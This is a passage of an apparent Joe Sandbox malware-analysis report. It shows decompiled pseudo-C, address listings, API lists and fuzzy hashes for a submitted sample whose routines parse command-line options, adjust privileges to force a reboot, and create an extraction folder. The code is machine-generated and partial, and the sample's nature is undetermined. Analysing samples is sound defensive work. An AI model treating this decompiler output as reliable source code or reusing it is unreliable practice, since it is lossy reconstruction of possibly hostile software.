                                                                                                                                                                                                      																								goto L70;
                                                                                                                                                                                                      																							} else {
                                                                                                                                                                                                      																								_t149 = _t147;
                                                                                                                                                                                                      																								if(_t149 == 0) {
                                                                                                                                                                                                      																									 *0x3e8d48 =  *0x3e8d48 | 0x00000080;
                                                                                                                                                                                                      																								} else {
                                                                                                                                                                                                      																									if(_t149 == 3) {
                                                                                                                                                                                                      																										 *0x3e9a2c =  *0x3e9a2c | 0x00000004;
                                                                                                                                                                                                      																										L70:
                                                                                                                                                                                                      																										 *0x3e8a28 = 1;
                                                                                                                                                                                                      																									} else {
                                                                                                                                                                                                      																										_t209 = 0;
                                                                                                                                                                                                      																									}
                                                                                                                                                                                                      																								}
                                                                                                                                                                                                      																							}
                                                                                                                                                                                                      																						}
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				_t144 =  *_t220;
                                                                                                                                                                                                      																				_t201 = _t144;
                                                                                                                                                                                                      																			} while (_t144 != 0);
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	 *0x3e9a2c = 3;
                                                                                                                                                                                                      																	 *0x3e8a28 = 1;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      																goto L50;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																if(_t132 == 0) {
                                                                                                                                                                                                      																	goto L98;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	L49:
                                                                                                                                                                                                      																	_t209 = 0;
                                                                                                                                                                                                      																	L50:
                                                                                                                                                                                                      																	_t173 = _v272;
                                                                                                                                                                                                      																	if( *_t173 != 0) {
                                                                                                                                                                                                      																		goto L2;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		break;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L106;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										L34:
                                                                                                                                                                                                      										_t209 = 0;
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L131;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *0x3e8a2c != 0 &&  *0x3e8b3e == 0) {
                                                                                                                                                                                                      						if(GetModuleFileNameA( *0x3e9a3c, 0x3e8b3e, 0x104) == 0) {
                                                                                                                                                                                                      							_t209 = 0;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t202 = 0x5c;
                                                                                                                                                                                                      							 *((char*)(E003E66C8(0x3e8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = _t209;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L131:
                                                                                                                                                                                                      			}
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d3f
                                                                                                                                                                                                      0x003e5d3f
                                                                                                                                                                                                      0x003e5d4b
                                                                                                                                                                                                      0x003e5d4b
                                                                                                                                                                                                      0x003e5d4f
                                                                                                                                                                                                      0x003e5d8d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d93
                                                                                                                                                                                                      0x003e5d93
                                                                                                                                                                                                      0x003e5d9a
                                                                                                                                                                                                      0x003e5d9d
                                                                                                                                                                                                      0x003e5d9e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d9e
                                                                                                                                                                                                      0x003e5d51
                                                                                                                                                                                                      0x003e5d5b
                                                                                                                                                                                                      0x003e5d72
                                                                                                                                                                                                      0x003e60fb
                                                                                                                                                                                                      0x003e60fb
                                                                                                                                                                                                      0x003e6207
                                                                                                                                                                                                      0x003e620a
                                                                                                                                                                                                      0x003e620b
                                                                                                                                                                                                      0x003e620e
                                                                                                                                                                                                      0x003e6217
                                                                                                                                                                                                      0x003e5d78
                                                                                                                                                                                                      0x003e5d78
                                                                                                                                                                                                      0x003e5d80
                                                                                                                                                                                                      0x003e5d83
                                                                                                                                                                                                      0x003e5d84
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d84
                                                                                                                                                                                                      0x003e5d5d
                                                                                                                                                                                                      0x003e5d5f
                                                                                                                                                                                                      0x003e5d62
                                                                                                                                                                                                      0x003e5d68
                                                                                                                                                                                                      0x003e5d64
                                                                                                                                                                                                      0x003e5d64
                                                                                                                                                                                                      0x003e5d64
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d62
                                                                                                                                                                                                      0x003e5d5b
                                                                                                                                                                                                      0x003e5d4f
                                                                                                                                                                                                      0x003e5d1d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d9f
                                                                                                                                                                                                      0x003e5d9f
                                                                                                                                                                                                      0x003e5da5
                                                                                                                                                                                                      0x003e5dab
                                                                                                                                                                                                      0x003e5dba
                                                                                                                                                                                                      0x003e6218
                                                                                                                                                                                                      0x003e621d
                                                                                                                                                                                                      0x003e6220
                                                                                                                                                                                                      0x003e6221
                                                                                                                                                                                                      0x003e6229
                                                                                                                                                                                                      0x003e6230
                                                                                                                                                                                                      0x003e6247
                                                                                                                                                                                                      0x003e626a
                                                                                                                                                                                                      0x003e6272
                                                                                                                                                                                                      0x003e6249
                                                                                                                                                                                                      0x003e6255
                                                                                                                                                                                                      0x003e625f
                                                                                                                                                                                                      0x003e6264
                                                                                                                                                                                                      0x003e6264
                                                                                                                                                                                                      0x003e6284
                                                                                                                                                                                                      0x003e5dc0
                                                                                                                                                                                                      0x003e5dc0
                                                                                                                                                                                                      0x003e5dca
                                                                                                                                                                                                      0x003e5e22
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5dcc
                                                                                                                                                                                                      0x003e5dce
                                                                                                                                                                                                      0x003e5e24
                                                                                                                                                                                                      0x003e5e24
                                                                                                                                                                                                      0x003e5e2c
                                                                                                                                                                                                      0x003e5e47
                                                                                                                                                                                                      0x003e5e4a
                                                                                                                                                                                                      0x003e61d2
                                                                                                                                                                                                      0x003e61e2
                                                                                                                                                                                                      0x003e61e7
                                                                                                                                                                                                      0x003e61ee
                                                                                                                                                                                                      0x003e61f1
                                                                                                                                                                                                      0x003e61f1
                                                                                                                                                                                                      0x003e61f8
                                                                                                                                                                                                      0x003e61f8
                                                                                                                                                                                                      0x003e5e50
                                                                                                                                                                                                      0x003e5e53
                                                                                                                                                                                                      0x003e6109
                                                                                                                                                                                                      0x003e611f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6125
                                                                                                                                                                                                      0x003e6137
                                                                                                                                                                                                      0x003e613a
                                                                                                                                                                                                      0x003e613c
                                                                                                                                                                                                      0x003e613e
                                                                                                                                                                                                      0x003e613e
                                                                                                                                                                                                      0x003e6141
                                                                                                                                                                                                      0x003e6141
                                                                                                                                                                                                      0x003e6143
                                                                                                                                                                                                      0x003e6144
                                                                                                                                                                                                      0x003e614a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e6150
                                                                                                                                                                                                      0x003e6152
                                                                                                                                                                                                      0x003e615c
                                                                                                                                                                                                      0x003e6170
                                                                                                                                                                                                      0x003e6172
                                                                                                                                                                                                      0x003e617c
                                                                                                                                                                                                      0x003e6190
                                                                                                                                                                                                      0x003e6190
                                                                                                                                                                                                      0x003e6196
                                                                                                                                                                                                      0x003e61a5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e61ab
                                                                                                                                                                                                      0x003e61b9
                                                                                                                                                                                                      0x003e61c6
                                                                                                                                                                                                      0x003e61c6
                                                                                                                                                                                                      0x003e617e
                                                                                                                                                                                                      0x003e6180
                                                                                                                                                                                                      0x003e618a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e618a
                                                                                                                                                                                                      0x003e615e
                                                                                                                                                                                                      0x003e6160
                                                                                                                                                                                                      0x003e616a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5eaf
                                                                                                                                                                                                      0x003e5eaf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5e79
                                                                                                                                                                                                      0x003e5e7d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5e83
                                                                                                                                                                                                      0x003e5e83
                                                                                                                                                                                                      0x003e5e83
                                                                                                                                                                                                      0x003e5e85
                                                                                                                                                                                                      0x003e5e85
                                                                                                                                                                                                      0x003e5e8e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5e94
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5e94
                                                                                                                                                                                                      0x003e5e8e
                                                                                                                                                                                                      0x003e5e7d
                                                                                                                                                                                                      0x003e5e77
                                                                                                                                                                                                      0x003e5e6e
                                                                                                                                                                                                      0x003e5e65
                                                                                                                                                                                                      0x003e5e5c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5dd0
                                                                                                                                                                                                      0x003e5dd0
                                                                                                                                                                                                      0x003e5dd0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5dd0
                                                                                                                                                                                                      0x003e5dce
                                                                                                                                                                                                      0x003e5dca
                                                                                                                                                                                                      0x003e5dba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5d00
                                                                                                                                                                                                      0x003e5dd9
                                                                                                                                                                                                      0x003e5e04
                                                                                                                                                                                                      0x003e61fe
                                                                                                                                                                                                      0x003e5e0a
                                                                                                                                                                                                      0x003e5e0c
                                                                                                                                                                                                      0x003e5e17
                                                                                                                                                                                                      0x003e5e17
                                                                                                                                                                                                      0x003e5e04
                                                                                                                                                                                                      0x003e6200
                                                                                                                                                                                                      0x003e6200
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharNextA.USER32(?,00000000,?,?), ref: 003E5CEE
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(003E8B3E,00000104,00000000,?,?), ref: 003E5DFC
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 003E5E3E
                                                                                                                                                                                                      • CharUpperA.USER32(-00000052), ref: 003E5EE1
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 003E5F6F
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 003E5FA7
                                                                                                                                                                                                      • CharUpperA.USER32(-0000004E), ref: 003E6008
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 003E60AA
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,003E1140,00000000,00000040,00000000), ref: 003E61F1
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 003E61F8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                      • String ID: "$"$:$RegServer
                                                                                                                                                                                                      • API String ID: 1203814774-25366791
                                                                                                                                                                                                      • Opcode ID: 4d8a5c123e619a78f1dd8d2c64480a7dbae24335865cafa5fcd3099d3af6d5da
                                                                                                                                                                                                      • Instruction ID: 58accc370bbe4b70010f4418d8508ac219bbeb8565e1d9f2ec7836c49d95fd53
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d8a5c123e619a78f1dd8d2c64480a7dbae24335865cafa5fcd3099d3af6d5da
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69D17071A08EF49FDF378B3B8C493FA37699B65348F1503A9D486DA5D1D6708E828B40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                                                                      			E003E1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				int _t28;
                                                                                                                                                                                                      				signed char _t30;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t41 = __esi;
                                                                                                                                                                                                      				_t38 = __edi;
                                                                                                                                                                                                      				_t30 = __ecx;
                                                                                                                                                                                                      				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						if( *0x3e9a40 != 0) {
                                                                                                                                                                                                      							_pop(_t30);
                                                                                                                                                                                                      							_t44 = _t46;
                                                                                                                                                                                                      							_t13 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                      							_push(_t38);
                                                                                                                                                                                                      							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                      								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                      								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                      								_v12 = 2;
                                                                                                                                                                                                      								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                      								CloseHandle(_v28);
                                                                                                                                                                                                      								_t41 = _t41;
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                      										_t25 = 1;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t37 = 0x4f7;
                                                                                                                                                                                                      										goto L3;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t37 = 0x4f6;
                                                                                                                                                                                                      									goto L4;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t37 = 0x4f5;
                                                                                                                                                                                                      								L3:
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								L4:
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								E003E44B9(0, _t37);
                                                                                                                                                                                                      								_t25 = 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_pop(_t40);
                                                                                                                                                                                                      							return E003E6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t37 = 0x522;
                                                                                                                                                                                                      						_t28 = E003E44B9(0, 0x522, 0x3e1140, 0, 0x40, 4);
                                                                                                                                                                                                      						if(_t28 != 6) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					__eax = E003E1EA7(__ecx);
                                                                                                                                                                                                      					if(__eax != 2) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						return _t28;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 003E1EFB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 003E1F02
                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 003E1FD3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                                      • API String ID: 2795981589-3733053543
                                                                                                                                                                                                      • Opcode ID: 35237957b774e024fc3975c2ea3239094e68991c622726173d644465776f58e4
                                                                                                                                                                                                      • Instruction ID: bee4d053e28c39f43ee1336e5b894f0c30ea9af819bf811d3110f82aec0feae2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35237957b774e024fc3975c2ea3239094e68991c622726173d644465776f58e4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0721D671B40295AADB325BA39C4AFBF77BCEB85B11F110319FA02DA1C1D7749C0296A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E6CF0(char _a4) {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                      				_t1 =  &_a4; // 0x3e6e26
                                                                                                                                                                                                      				UnhandledExceptionFilter( *_t1);
                                                                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x003e6cf7
                                                                                                                                                                                                      0x003e6cfd
                                                                                                                                                                                                      0x003e6d00
                                                                                                                                                                                                      0x003e6d19

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003E6E26,003E1000), ref: 003E6CF7
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(&n>,?,003E6E26,003E1000), ref: 003E6D00
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,003E6E26,003E1000), ref: 003E6D0B
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,003E6E26,003E1000), ref: 003E6D12
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                      • String ID: &n>
                                                                                                                                                                                                      • API String ID: 3231755760-4187928770
                                                                                                                                                                                                      • Opcode ID: 5bbf848b3d8e7a7aaf280cc9b2aa4188385ce994fb7b41314d922ae85ef32888
                                                                                                                                                                                                      • Instruction ID: 983f66e79ce0059eec1466fb001d39bc02d57f2e5ac55bfdb944be9ce7285f12
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bbf848b3d8e7a7aaf280cc9b2aa4188385ce994fb7b41314d922ae85ef32888
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4FD01232004988BBDB222BF1EC4CA593F2CFB49313F454104F31E8A0A0CB326451CB53
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                                                                      			E003E3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				int _t20;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				int _t23;
                                                                                                                                                                                                      				char _t24;
                                                                                                                                                                                                      				long _t25;
                                                                                                                                                                                                      				int _t27;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				int _t38;
                                                                                                                                                                                                      				int _t39;
                                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				CHAR* _t49;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				struct HWND__* _t64;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t64 = _a4;
                                                                                                                                                                                                      				_t6 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                      					EndDialog(_t64, ??);
                                                                                                                                                                                                      					L39:
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 = 1;
                                                                                                                                                                                                      				_t10 = _t6 - 0x100;
                                                                                                                                                                                                      				if(_t10 == 0) {
                                                                                                                                                                                                      					E003E43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                      					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                      					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                      					__eflags =  *0x3e9a40 - _t42; // 0x3
                                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                                      						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L36:
                                                                                                                                                                                                      					return _t42;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t10 == _t42) {
                                                                                                                                                                                                      					_t20 = _a12 - 1;
                                                                                                                                                                                                      					__eflags = _t20;
                                                                                                                                                                                                      					if(_t20 == 0) {
                                                                                                                                                                                                      						_t21 = GetDlgItemTextA(_t64, 0x835, 0x3e91e4, 0x104);
                                                                                                                                                                                                      						__eflags = _t21;
                                                                                                                                                                                                      						if(_t21 == 0) {
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							_t58 = 0x4bf;
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                      							E003E44B9(_t64, _t58);
                                                                                                                                                                                                      							goto L39;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t49 = 0x3e91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t23 =  *_t49;
                                                                                                                                                                                                      							_t49 =  &(_t49[1]);
                                                                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                                                                      						} while (_t23 != 0);
                                                                                                                                                                                                      						__eflags = _t49 - 0x3e91e5 - 3;
                                                                                                                                                                                                      						if(_t49 - 0x3e91e5 < 3) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 =  *0x3e91e5; // 0x3a
                                                                                                                                                                                                      						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                      						if(_t24 == 0x3a) {
                                                                                                                                                                                                      							L21:
                                                                                                                                                                                                      							_t25 = GetFileAttributesA(0x3e91e4);
                                                                                                                                                                                                      							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                      							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      								L26:
                                                                                                                                                                                                      								E003E658A(0x3e91e4, 0x104, 0x3e1140);
                                                                                                                                                                                                      								_t27 = E003E58C8(0x3e91e4);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 != 0) {
                                                                                                                                                                                                      									__eflags =  *0x3e91e4 - 0x5c;
                                                                                                                                                                                                      									if( *0x3e91e4 != 0x5c) {
                                                                                                                                                                                                      										L30:
                                                                                                                                                                                                      										_t30 = E003E597D(0x3e91e4, 1, _t64, 1);
                                                                                                                                                                                                      										__eflags = _t30;
                                                                                                                                                                                                      										if(_t30 == 0) {
                                                                                                                                                                                                      											L35:
                                                                                                                                                                                                      											_t42 = 1;
                                                                                                                                                                                                      											__eflags = 1;
                                                                                                                                                                                                      											goto L36;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                      										_t42 = 1;
                                                                                                                                                                                                      										EndDialog(_t64, 1);
                                                                                                                                                                                                      										goto L36;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0x3e91e5 - 0x5c;
                                                                                                                                                                                                      									if( *0x3e91e5 == 0x5c) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L30;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_t58 = 0x4be;
                                                                                                                                                                                                      								goto L25;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t32 = E003E44B9(_t64, 0x54a, 0x3e91e4, 0, 0x20, 4);
                                                                                                                                                                                                      							__eflags = _t32 - 6;
                                                                                                                                                                                                      							if(_t32 != 6) {
                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t33 = CreateDirectoryA(0x3e91e4, 0);
                                                                                                                                                                                                      							__eflags = _t33;
                                                                                                                                                                                                      							if(_t33 != 0) {
                                                                                                                                                                                                      								goto L26;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x3e91e4);
                                                                                                                                                                                                      							_t58 = 0x4cb;
                                                                                                                                                                                                      							goto L25;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags =  *0x3e91e4 - 0x5c;
                                                                                                                                                                                                      						if( *0x3e91e4 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                      						if(_t24 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t34 = _t20 - 1;
                                                                                                                                                                                                      					__eflags = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						EndDialog(_t64, 0);
                                                                                                                                                                                                      						 *0x3e9124 = 0x800704c7;
                                                                                                                                                                                                      						goto L39;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t34 != 0x834;
                                                                                                                                                                                                      					if(_t34 != 0x834) {
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t37 = LoadStringA( *0x3e9a3c, 0x3e8, 0x3e8598, 0x200);
                                                                                                                                                                                                      					__eflags = _t37;
